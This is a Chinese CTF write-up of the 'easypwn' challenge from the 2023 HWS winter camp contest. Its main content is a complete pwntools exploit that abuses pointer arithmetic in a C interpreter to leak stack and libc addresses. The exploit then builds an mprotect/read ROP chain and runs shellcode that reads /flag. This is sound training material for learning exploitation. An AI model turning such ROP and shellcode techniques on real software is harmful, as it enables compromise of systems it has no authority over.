---
title: 2023 HWS冬令营入营赛 pwn 复现
date: 2023-02-10 09:54:59 +0800
categories:
  - ctf比赛
tags:
  - pwn
  - ctf
permalink: /posts/id=56/
pin: false
published:
---

题目有点非常规

## easypwn

一道github有源码的C解释器，漏洞点在于C语言对指针的可操作性，这里通过`memory_addr = &memory_addr;`获得一个内存地址，然后通过加减偏移得到栈地址和libc地址，后续就是劫持ret返回为栈上rop链

实际在做题过程中，就是逆向部分，可行的方式是F12找到2个debug symbol，再加上一些带有赋值语句的示例C代码，尝试动调来理解程序的语句含义，定位关键的赋值部分代码。

```python
# 2.34-0ubuntu3_amd64
# _*_ coding:utf-8 _*_
from pwn import *
import re
import os, struct, random, time, sys, signal
import hashlib
from hashlib import sha256

# p = remote("","")
p = process("./xc")
elf = ELF("./xc")
libc = elf.libc

context.log_level = "info" # info
context.arch = elf.arch
context.terminal = ['tmux', 'splitw', '-hp','60']


def dbg(breakpoint=''):
    elf_base = int(os.popen('pmap {}| awk \x27{{print \x241}}\x27'.format(p.pid)).readlines()[1], 16) if elf.pie else 0
    script = 'b *{:#x}\n'.format(int(breakpoint) + elf_base) if isinstance(breakpoint, int) else breakpoint
    script += 'set *0x55555555c088=1\n'# 逐句执行并输出相应汇编
    # script += 'set *0x55555555c0a0=1\n'# 输出完整汇编但不执行
    gdb.attach(p,script)

#-----------------------------------------------------------------------------------------
s       = lambda data               :p.send(str(data))
sa      = lambda text,data          :p.sendafter(text, str(data))
sl      = lambda data               :p.sendline(str(data))
sla     = lambda text,data          :p.sendlineafter(text, str(data))
r       = lambda num=4096           :p.recv(num)
ru      = lambda text               :p.recvuntil(text)
ia      = lambda                    :p.interactive()
hs256   = lambda data               :sha256(str(data).encode()).hexdigest()
l32     = lambda                    :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
l64     = lambda                    :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
uu32    = lambda                    :u32(p.recv(4).ljust(4,'\x00'))
uu64    = lambda                    :u64(p.recv(6).ljust(8,'\x00'))
int16   = lambda data               :int(data,16)
lg      = lambda s                  :p.success('%s -> 0x%x' % (s, eval(s)))
# sc      = lambda                    :shellcraft.amd64.linux.sh()
#-----------------------------------------------------------------------------------------

code = '''
int main()
{
    int *memory_addr;
    int *stack_addr;
    int libc_addr;

    memory_addr = &memory_addr;
    memory_addr = memory_addr + (0x18/8);
    stack_addr = *memory_addr;
    stack_addr = stack_addr - (0x128/8);
    libc_addr = *stack_addr;
    libc_addr = libc_addr - 0x2dfd0;

    *stack_addr = libc_addr + 0x000000000002e6c5; // rdi
    stack_addr++;
    *stack_addr = stack_addr & (~0xfff);
    stack_addr++;
    *stack_addr = libc_addr + 0x000000000012a8e1; // rsi
    stack_addr++;
    *stack_addr = 0x1000;
    stack_addr++;
    *stack_addr = libc_addr + 0x0000000000122431; // rdx r12
    stack_addr++;
    *stack_addr = 7;
    stack_addr++;
    *stack_addr = 0;
    stack_addr++;
    *stack_addr = libc_addr + 0x121bb0; // mprotect
    stack_addr++;
    
    *stack_addr = libc_addr + 0x000000000002e6c5; // rdi
    stack_addr++;
    *stack_addr = 0;
    stack_addr++;
    *stack_addr = libc_addr + 0x000000000012a8e1; // rsi
    stack_addr++;
    *stack_addr = stack_addr & (~0xfff);
    stack_addr++;
    *stack_addr = libc_addr + 0x0000000000122431; // rdx r12
    stack_addr++;
    *stack_addr = 0x1000;
    stack_addr++;
    *stack_addr = 0;
    stack_addr++;
    *stack_addr = libc_addr + 0x117900; // read
    stack_addr++;
    *stack_addr = stack_addr & (~0xfff);
}
'''
# dbg(0x477B)# 赋值语句
# dbg(0x5380)# ret
sla("Pls input the programe",code)
s(asm(shellcraft.cat('/flag')))

ia()
```

